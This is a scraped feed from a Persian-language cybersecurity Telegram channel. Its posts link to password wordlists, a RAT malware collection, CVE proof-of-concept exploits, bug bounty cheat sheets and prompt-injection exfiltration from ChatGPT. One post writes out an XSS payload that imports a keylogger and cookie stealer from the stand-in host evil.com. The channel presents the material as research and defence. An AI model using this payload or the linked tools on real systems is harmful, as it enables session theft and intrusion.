iDeFense
5.05K subscribers
119 photos
31 videos
40 files
297 links
🔶 اخبار امنیت سایبری
🔴 بررسی و تحلیل آسیب پذیری ها و حفره های امنیتی
🔵 بررسی راه های تشخیص و جلوگیری از نفوذ
🎥 کانال آپارات
⚜️ aparat.com/iDeFense
🎥 کانال یوتیوب
⚜️ youtube.com/@_iDeFense
💾 کانال بکاپ
⚜️ @iDeF3nse
🔱 @iDeFense_Tester
Download Telegram
🔎 وب‌سایت Weakpass مجموعه ای از لیست های رمز عبور برای اهداف مختلف از تست نفوذ گرفته تا بهبود امنیت رمز عبور را ارائه می‌دهد که به‌صورت تخصصی برای ارزیابی امنیتی طراحی شده‌اند
📖 این منبع شامل انواع دیکشنری‌ها برای تحلیل و حملات رمزنگاری است که دسترسی به آن‌ها به‌صورت کاملاً رایگان و بدون محدودیت ارائه می‌شود

📌 از ویژگی های این سایت، اینکه جستجوها کاملاً در سمت کلاینت انجام می‌شود و هیچ داده‌ای به سرور ارسال نمی‌گردد، که این امر امنیت و حریم خصوصی کاربر را تضمین می‌کند.

📌 همچنین این سایت API پیشرفته‌ای برای ادغام آسان در ابزارها و فرآیندهای امنیتی دارد و امکان دانلود کل دیکشنری‌ها را فراهم کرده است. به این ترتیب، متخصصان امنیت می‌توانند این دیکشنری‌ها را برای کنترل کیفیت رمز عبورها و اطمینان از تطابق با سیاست‌های امنیتی داخلی سازمان‌ها به‌کار گیرند

🌐 https://weakpass.com/

#Bruteforce

@iDeFense
❤‍🔥1👍1
💢 A tool used to generate a wordlist from user input, in order to use for password dictionary attacks

👁‍🗨 https://github.com/flashnuke/pass-generator

#Bruteforce

@iDeFense
👍7
🦠 Ultimate RAT Collection

🔬 https://codesandbox.io/p/github/sorokinvld/Ultimate-RAT-Collection

⚠️ Note: I am not responsible for any problems you may encounter.
⚠️ You run and download these samples at your own risk.
⚠️ You agree by downloading to use every sample lawfully and for research only.


⚠️ توجه : این ابزارها فقط برای اهداف آموزشی است و ما مسئولیتی در قبال هرگونه سوء استفاده یا فعالیت غیرقانونی نداریم

#Rat
#Malware
#Malware_Analysis
#Reverse_engineering

@iDeFense
👍31🔥1
♨️ Exfiltration of personal information from ChatGPT via prompt
injection
📚 https://arxiv.org/pdf/2406.00199

⚠️ DATA EXFILTRATION TECHNIQUES FOR CHATGPT
#POC
👁‍🗨 https://github.com/R3DRUN3/sploitcraft/tree/main/llm/data-exfiltration/chat-gpt

#ChatGPT
#EXFILTRATION

@iDeFense
سلام ؛ میزبان ارائه ها و مطالب و محتوای آموزشی شما در راستای ارتقا سطح سواد امنیتی در آیدیفنس هستیم ؛ برای انتشار مطالب و همچنین برای عضویت در تیم های فعال مجموعه با پشتیبانی در ارتباط باشید
@iDeFense_Tester
🤝4💯31🤷‍♂1
@idefense.gif
96.6 MB
👍2❤‍🔥1
This media is not supported in your browser
VIEW IN TELEGRAM
‼️وقتی تصمیم می گیرید که فقط رویدادهای امنیتی اساسی رو بررسی کنید...😬

#fun
#SOC
#Critical_Alert
#BlueTeam

@iDeFense
😁8👻1🙈1
🚨 CVE-2024-53677-S2-067🚨

💢 CVSS Score: 9.5 (Critical)
Apache Struts versions 2.0.0 <= 2.5.33 & 6.0.0 <= 6.3.0.2

🛟 The issue has been resolved in Apache Struts 6.4.0 and later versions

‼️ CVE-2024-53677 is a critical vulnerability that allows attackers to exploit weaknesses in the file upload mechanism of Apache Struts. By manipulating the file upload parameters, an attacker can achieve the following:

⚠️ Path Traversal: Upload files to arbitrary locations within the server, bypassing security mechanisms.

⚠️ Remote Code Execution (RCE): Execute malicious code by uploading and triggering executable files, such as .jsp scripts or binary payloads.

🔰 According to the Apache Struts advisory, the vulnerability is not backward-compatible with older file upload mechanisms. As such, organizations using the deprecated file upload method must rewrite their actions to adopt the new, secure mechanism introduced in version 6.4.0.

🔬 POC : https://github.com/TAM-K592/CVE-2024-53677-S2-067

#CVE
#Apache
#RCE

@iDeFense
❤‍🔥3🤔3🏆1🗿1
عزیزانی که علاقه مند به تولید محتوای ویدیویی و همچنین علاقه مند به پژوهش هستند جهت عضویت در گروه درخواست بدن
@iDeFense_Tester
7🗿3
iDeFense
عزیزانی که علاقه مند به تولید محتوای ویدیویی و همچنین علاقه مند به پژوهش هستند جهت عضویت در گروه درخواست بدن @iDeFense_Tester
اینبار در شاخه های مختلف(کد نویسی امن ؛ رد تیمینگ ؛ باینری) و مختص اسیب پذیری های وب نیست
🎄6🗿2
😈 [ Eliran Nissan @eliran_nissan ]

I am excited to share with you my latest research - "DCOM Upload & Execute".
An advanced lateral movement technique to upload and execute custom payloads on remote targets.
Forget about PSEXEC and dive in!

Blog:
🔗 https://www.deepinstinct.com/blog/forget-psexec-dcom-upload-execute-backdoor

Code:
🔗 https://github.com/deepinstinct/DCOMUploadExec

[ tweet ]
🔥6
Exploit for Windows Kernel-Mode Driver Elevation of Privilege Flaw (CVE-2024-35250)

This security flaw is due to an untrusted pointer dereference weakness that allows local attackers to gain SYSTEM privileges in low-complexity attacks that don't require user interaction.
👍4
🔖Bug Bounty CheatSheet

🔴XSS

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴SQLi

🔘 Github: 🔗Link

🔴SSRF

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴CRLF

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴CSV-Injection

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴Command Injection

🔘 Github: 🔗Link

🔴Directory Traversal

🔘 Github: 🔗Link

🔴LFI

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴XXE

🔘 Github: 🔗Link

🔴Open-Redirect

🔘 Github: 🔗Link

🔴RCE

🔘 Github: 🔗Link

🔴Crypto

🔘 Github: 🔗Link

🔴Template Injection

🔘 Github: 🔗Link
🔘 Github: 🔗Link

🔴XSLT

🔘 Github: 🔗Link

🔴Content Injection

🔘 Github: 🔗Link

🔴LDAP Injection

🔘 Github: 🔗Link

🔴NoSQL Injection

🔘 Github: 🔗Link

🔴CSRF Injection

🔘 Github: 🔗Link

🔴GraphQL Injection

🔘 Github: 🔗Link

🔴IDOR

🔘 Github: 🔗Link

🔴ISCM

🔘 Github: 🔗Link

🔴LaTex Injection

🔘 Github: 🔗Link

🔴OAuth

🔘 Github: 🔗Link

🔴XPATH Injection

🔘 Github: 🔗Link

🔴Bypass Upload Tricky

🔘 Github: 🔗Link

#pentestin #bugbounty #Tools

@iDeFense
👍6
AttackRuleMap

🔺 پروژه مپ Atomic Red Team بر روی
🔘 Splunk ESCU ( در حال تکمیل/فعلا ویندوز )
🔘 Sigma Rules

🔗 https://attackrulemap.netlify.app/

#sigma
#Splunk
#ESCU
#BlueTeam
#SOC

@iDeFense
4
This media is not supported in your browser
VIEW IN TELEGRAM
👁‍🗨UPDATED

💢 CVE-2024-49112 : Windows Lightweight Directory Access Protocol - Remote Code Execution (AKA : LDAP Nightmare)

( The RCE vulnerability was assigned as CVE-2024-49112 and was given the CVSS severity score of 9.8 out of 10 )

♨️ cve-2024-49113 : the DOS vulnerability was assigned CVE-2024-49113
Windows 10 Version 1607 (both 32-bit and x64-based) up to 10.0.14393.7606
Windows Server 2012
Windows Server 2016
Windows Server 2019
Windows Server 2022
Windows 11 22H2
Windows Server 2022 23H2
Windows 11 24H2
Windows Server 2025

🚩 POC : https://github.com/SafeBreach-Labs/CVE-2024-49112
♨️ Blog : https://www.safebreach.com/blog/ldapnightmare-safebreach-labs-publishes-first-proof-of-concept-exploit-for-cve-2024-49113/

#RCE
#LDAP
#Active_Directory
#CVE
#DOS

@iDeFense
🔥4👍1
🕳 A Simple JS code to keylogger data and send it to the personal server + svg file to send the (document.cookie)

💣 https://github.com/11whoami99/XSS-keylogger

📝 USES :

The Keylogger in something like XSS Via OpenRedirect in Login Page :
==> ?domain=javascript%3aimport(//evil.com/xss.js)

📚 در یک وب‌سایت آسیب‌پذیر xss، ممکن است پارامتر domain یا مشابه آن به‌صورت مستقیم در redirect استفاده شود:
🔬https://example.com/redirect?domain=https://legit-site.com

مهاجم لینک زیر را می‌سازد:
🔬https://example.com/redirect?domain=javascript:import(//evil.com/xss.js)

#XSS
#Open_Redirect
#keylogger
#web

@iDeFense
👍51
This media is not supported in your browser
VIEW IN TELEGRAM
🔬 پروژه NetAlertX ابزاری برای مانیتورینگ و مدیریت شبکه‌های WiFi و LAN است که قابلیت‌های متعددی را برای نظارت، شناسایی تغییرات، و ایجاد هشدارها ارائه می‌دهد. این ابزار برای کسانی که می‌خواهند شبکه خود را از نظر امنیتی و عملکردی رصد کنند مفید است

🔍 https://github.com/jokob-sk/NetAlertX

🔷 بررسی دستگاه‌های متصل به شبکه (مانند کامپیوترها، موبایل‌ها، دوربین‌ها و غیره)
🔷 شناسایی تغییرات در پورت‌ها یا اتصال دستگاه‌های جدید
🔷 امکان برنامه‌ریزی برای اسکن دوره‌ای شبکه به منظور شناسایی دستگاه‌های متصل
🔷 تغییرات در پورت‌ها
🔷 اضافه شدن دستگاه‌های ناشناس
🔷 سیستم هشدار (Alert) و ...

#Network
#tools
#wifi

@iDeFense
👍4👏1
〽️ پروژه LitterBox به‌طور خاص برای توسعه و آزمایش تکنیک‌های اجتناب از شناسایی و تحلیل رفتار فایل‌ها یا فرآیندها طراحی شده است. هدف اصلی این پلتفرم کمک به متخصصین امنیتی است تا پیلود ها (Payloads) و ابزارهای خود را قبل از اجرای واقعی آزمایش و بهینه کنند
📦 https://github.com/BlackSnufkin/LitterBox

♾️ توسعه‌دهندگان و متخصصان امنیتی میتوانند از این ابزار به‌عنوان یک محیط شبیه‌سازی (Sandbox) جهت

🔺 روش‌های گریز از شناسایی (Evasion Techniques)
🔺 امضاهای شناسایی (Detection Signatures) را ارزیابی کنند
🔺 رفتار بدافزارها را بدون تأثیر بر سیستم‌های واقعی بررسی و تحلیل کنند

قابلیت تحلیل ایستا (Static Analysis) و تحلیل پویا (Dynamic Analysis)

🔘 شناسایی فایل با الگوریتم‌های هش (MD5، SHA256)
🔘 محاسبه آنتروپی شانن برای تشخیص رمزگذاری‌ها
🔘 تحلیل نوع فایل و شناسایی MIME
🔘 تشخیص نوع فایل PE
🔘 شناسایی معماری ماشین (x86، x64)
🔘 تحلیل تاریخ کامپایل
🔘 طبقه‌بندی Subsystem
🔘 تشخیص Entry Point
🔘 نقشه‌برداری وابستگی DLLهای وارد شده (Import DLL).
📑 تحلیل اسناد آفیس
🔘 تشخیص و استخراج ماکروها
🔘 تحلیل کد VBA و شناسایی محتوای مخفی

✔️ پایش رفتار با اجرا مستقیم فایل‌ها و تحلیل
✔️ بازرسی مناطق حافظه
✔️ تشخیص تزریق فرآیند (Process Hollowing)
✔️ تحلیل تکنیک‌های تزریق (Injection Techniques)
✔️ نظارت بر Sleep Patterns

#RedTeam
#Sandboxing
#StaticAnalysis
#PayloadTesting
#DynamicAnalysis
#MalwareAnalysis
#ThreatSimulation
#MalwareDevelopment
#AdvancedThreatAnalysis

@iDeFense
👍10🙏1